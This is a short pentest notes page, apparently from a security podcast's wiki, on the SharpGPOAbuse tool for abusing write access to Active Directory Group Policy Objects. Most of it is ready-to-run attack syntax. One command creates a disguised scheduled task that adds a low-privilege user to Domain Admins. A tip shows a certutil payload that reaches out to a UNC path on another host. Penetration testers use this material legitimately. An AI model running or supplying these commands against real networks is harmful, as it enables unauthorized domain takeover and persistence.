# SharpGPOabuse
An awesome tool for abusing "generic write" access to GPOs (which you might identify after running BloodHound). Here’s a sample syntax you could run:

```
SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD /DOMAIN" --GPOName "Name of GPO with Generic Write Access"
```

We talked about this tool in more detail on [episode #441 of the 7 Minute Security podcast](https://7minsec.com/blog/2020/11/15/7ms-441-sharpgpoabuse/).

!!!tip Tip
Unlike [pygpoabuse](pentesting/internal/pygpoabuse), if you're running a payload like `-command "certutil -syncwithwu \\10.1.2.3"` you do *not* need to double escape the UNC path with backslashes.  Just `\\uncpath` will work fine.
!!!